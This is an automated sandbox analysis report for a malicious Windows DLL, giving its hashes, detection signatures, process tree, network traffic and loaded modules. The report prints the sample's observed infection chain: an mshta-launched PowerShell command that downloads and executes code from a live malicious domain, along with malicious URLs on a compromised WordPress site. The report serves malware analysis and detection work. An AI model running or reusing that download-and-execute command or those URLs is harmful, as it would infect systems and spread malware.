Windows Analysis Report
UPazTgVGA7.dll

Overview

General Information

Sample name: UPazTgVGA7.dll
(renamed file extension from exe to dll, renamed because original name is a hash value)
Original sample name: e3493cc788d91b70277729ea748cce0d.exe
Analysis ID: 1445895
MD5: e3493cc788d91b70277729ea748cce0d
SHA1: f1246730dafb3bf93f98d5b08baa5315626fb28a
SHA256: 08a15e5718a53a317604d19b4ea49f1844d7a53af353808e7bfb9dc81cfe2342
Tags: 64exe

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Windows Binaries Write Suspicious Extensions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • loaddll64.exe (PID: 2640 cmdline: loaddll64.exe "C:\Users\user\Desktop\UPazTgVGA7.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5888 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 2668 cmdline: rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • WerFault.exe (PID: 4304 cmdline: C:\Windows\system32\WerFault.exe -u -p 2668 -s 424 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 3504 cmdline: rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,hash MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 2968 cmdline: C:\Windows\system32\WerFault.exe -u -p 3504 -s 244 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 4280 cmdline: rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,xlAutoOpen MD5: EF3179D498793BF4234F708D3BE28633)
      • mshta.exe (PID: 7120 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta MD5: 06B02D5C097C7DB1F109749C45F3F505)
        • powershell.exe (PID: 7200 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk') MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7376 cmdline: rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",hash MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7456 cmdline: C:\Windows\system32\WerFault.exe -u -p 7376 -s 424 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7384 cmdline: rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",xlAutoOpen MD5: EF3179D498793BF4234F708D3BE28633)
      • mshta.exe (PID: 7536 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta MD5: 06B02D5C097C7DB1F109749C45F3F505)
        • powershell.exe (PID: 7624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk') MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta, CommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,xlAutoOpen, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 4280, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta, ProcessId: 7120, ProcessName: mshta.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7120, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), ProcessId: 7200, ProcessName: powershell.exe
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\rundll32.exe, ProcessId: 4280, TargetFilename: c:\users\public\example.hta
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7120, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), ProcessId: 7200, ProcessName: powershell.exe
No Snort rule has matched


AV Detection

Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtf; Avira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt?M;(; Avira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen72be476187889df5a41b67e836; Avira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtg; Avira URL Cloud: Label: malware
Source: http://iapartmentlistings.com/tykhwuxk; Avira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtLMEM; Avira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt; Avira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txth; Avira URL Cloud: Label: malware
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 83.2% probability
Source: UPazTgVGA7.dll; Joe Sandbox ML: detected
Source: unknown; HTTPS traffic detected: 194.124.213.167:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: UPazTgVGA7.dll; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Networking

Source: C:\Windows\System32\rundll32.exe; Network Connect: 194.124.213.167 443
Source: Joe Sandbox View; ASN Name: SOLNETCH SOLNETCH
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic; HTTP traffic detected:
    GET /wp-content/plugins/wp-automatic/d.txt HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: www.siguefutbol.com
    Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
    GET /tykhwuxk HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: iapartmentlistings.com
    Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: www.siguefutbol.com
Source: global traffic; DNS traffic detected: DNS query: iapartmentlistings.com
Source: Amcache.hve.8.dr; String found in binary or memory: http://upx.sf.net
Source: rundll32.exe, 0000000C.00000002.2040242561.000002AC3A833000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com
Source: rundll32.exe, 0000000C.00000002.2040242561.000002AC3A833000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.siguefutbol.com/
Source: rundll32.exe, 0000000C.00000002.2040242561.000002AC3A833000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.siguefutbol.com/f=
Source: rundll32.exe, 0000000C.00000002.2040242561.000002AC3A894000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2040242561.000002AC3A7C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2040242561.000002AC3A833000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2040242561.000002AC3A7CE000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt
Source: rundll32.exe, 0000000C.00000002.2040242561.000002AC3A833000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt?M;(
Source: rundll32.exe, 00000012.00000002.2067605540.000001B9DE938000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtLMEM
Source: rundll32.exe, 00000012.00000002.2067605540.000001B9DE880000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtf
Source: rundll32.exe, 00000012.00000002.2067605540.000001B9DE888000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtg
Source: rundll32.exe, 00000012.00000002.2067605540.000001B9DE880000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txth
Source: rundll32.exe, 00000003.00000002.2194404409.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2207076977.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.2180195670.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, UPazTgVGA7.dll; String found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen72be476187889df5a41b67e836
Source: unknown; Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49706
Source: C:\Windows\System32\rundll32.exe; Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2668 -s 424
Source: UPazTgVGA7.dll; Static PE information: Number of sections : 11 > 10
Source: C:\Windows\SysWOW64\mshta.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine; Classification label: mal76.evad.winDLL@27/21@2/2
Source: C:\Windows\System32\rundll32.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\d[1].txt
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7376
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
Source: C:\Windows\System32\WerFault.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3504
Source: C:\Windows\System32\WerFault.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2668
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\System32\WerFault.exe; File created: C:\ProgramData\Microsoft\Windows\WER\Temp\187fc8ed-96b8-4b8b-8b6b-8a8d645903b0
Source: UPazTgVGA7.dll; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\rundll32.exe; File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\loaddll64.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,hash
Source: unknown; Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\UPazTgVGA7.dll"
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",#1
Source: C:\Windows\System32\rundll32.exe; Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3504 -s 244
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\UPazTgVGA7.dll,xlAutoOpen
Source: C:\Windows\System32\rundll32.exe; Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
Source: C:\Windows\SysWOW64\mshta.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",hash
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\UPazTgVGA7.dll",xlAutoOpen
Source: C:\Windows\System32\rundll32.exe; Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7376 -s 424
Source: C:\Windows\System32\loaddll64.exe; Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll64.exe; Section loaded: urlmon.dll
Source: C:\Windows\System32\loaddll64.exe; Section loaded: iertutil.dll
Source: C:\Windows\System32\loaddll64.exe; Section loaded: srvcli.dll
Source: C:\Windows\System32\loaddll64.exe; Section loaded: netutils.dll
Source: C:\Windows\System32\loaddll64.exe; Section loaded: windows.storage.dll
Source: C:\Windows\System32\loaddll64.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\loaddll64.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\mshta.exe; Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
